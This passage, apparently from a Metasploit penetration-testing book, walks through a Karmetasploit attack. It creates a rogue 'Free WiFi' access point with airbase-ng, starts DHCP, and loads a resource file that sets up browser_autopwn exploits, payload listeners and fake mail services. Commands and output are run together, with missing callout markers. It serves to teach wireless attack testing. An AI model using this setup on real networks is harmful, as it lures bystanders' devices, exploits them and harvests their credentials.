The airbase-ng component of the Aircrack-ng suite is used to create Karmeta-sploit’s fake access point. In the next example, we configure the airbase-ng access point to respond to all probes (-P), to beacon every 30 seconds (-C 30) with the ESSID Free Wi-Fi (-e "Free WiFi"), and to be verbose (-v) using the interface mon0:
root@bt:/opt/metasploit3/msf3#airbase-ng -P -C 30 -e "Free WiFi" -v mon014:06:57 Created tap interface
at014:06:57 Trying to set MTU on at0 to 1500 14:06:57 Trying to set MTU on mon0 to 1800 14:06:57 Access Point with BSSID 00:21:29:E2:DE:14 started.
As you can see at , Airbase-ng creates a new interface called at0. Karmetasploit will use this interface.
Next, we turn on the at0 interface and start the DHCP server:
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0root@bt:/opt/metasploit3/msf3#
dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0. . . SNIP . . .Wrote 0 leases to leases file. Listening on LPF/at0/00:21:29:e2:de:14/10.0.0/24 Sending on LPF/at0/00:21:29:e2:de:14/10.0.0/24 Sending on Socket/fallback/fallback-net Can't create PID file /var/run/dhcpd.pid: Permission denied.root@bt:/opt/metasploit3/msf3#
ps aux |grep dhcpddhcpd 4015 0.0 0.2 3812 1840 ? Ss 14:09 0:00 dhcpd3 -cf /etc/dhcp3/ dhcpd.conf at0 root 4017 0.0 0.0 2012 564 pts/4 S+ 14:09 0:00 grep dhcpdroot@bt:/opt/metasploit3/msf3# tail
tail -f /var/log/messagesApr 2 14:06:57 bt kernel: device mon0 entered promiscuous mode Apr 2 14:09:30 bt dhcpd: Internet Systems Consortium DHCP Server V3.1.1 Apr 2 14:09:30 bt kernel: warning: `dhcpd3' uses 32-bit capabilities (legacy support in use) Apr 2 14:09:30 bt dhcpd: Copyright 2004-2008 Internet Systems Consortium. Apr 2 14:09:30 bt dhcpd: All rights reserved. Apr 2 14:09:30 bt dhcpd: For info, please visit http://www.isc.org/sw/dhcp/ Apr 2 14:09:30 bt dhcpd: Wrote 0 leases to leases file. Apr 2 14:09:30 bt dhcpd: Listening on LPF/at0/00:21:29:e2:de:14/10.0.0/24 Apr 2 14:09:30 bt dhcpd: Sending on LPF/at0/00:21:29:e2:de:14/10.0.0/24
The at0 interface is turned on using the IP address of 10.0.0.1 shown at , and the DHCP server is started using the configuration file we created earlier, also using at0 as shown at . To make sure that the DHCP server is running, we run a quick ps aux at . Finally, we tail the messages log file at to see when IP addresses are being handed out.
Now that the entire Karmetasploit configuration is complete, we can load the resource file from within msfconsole using resource karma.rc as shown next. (Note that we can also pass the resource file to msfconsole via the command line by entering msfconsole -r karma.rc.) Let’s see it in action:
msf >resource karma.rcresource (karma.rc)>db_connect postgres:toor@127.0.0.1/msfbookresource (karma.rc)>use auxiliary/server/browser_autopwnresource (karma.rc)>setg AUTOPWN_HOST 10.0.0.1AUTOPWN_HOST => 10.0.0.1 resource (karma.rc)>setg AUTOPWN_PORT 55550AUTOPWN_PORT => 55550 resource (karma.rc)>setg AUTOPWN_URI /adsAUTOPWN_URI => /adsset LHOST 10.0.0.1LHOST => 10.0.0.1 resource (karma.rc)>set LPORT 45000LPORT => 45000 resource (karma.rc)>set SRVPORT 55550SRVPORT => 55550 resource (karma.rc)>set URIPATH /adsURIPATH => /ads resource (karma.rc)>run[*] Auxiliary module execution completedset SRVPORT 110SRVPORT => 110 resource (karma.rc)>set SSL falseSSL => false resource (karma.rc)>run. . . SNIP . . .
As you can see, a great deal is happening with the resource file. In this listing, the LHOST address is set to 10.0.0.1 at , the POP3 service (among others) is started at , the autopwn exploits are loaded at , and payloads are configured at .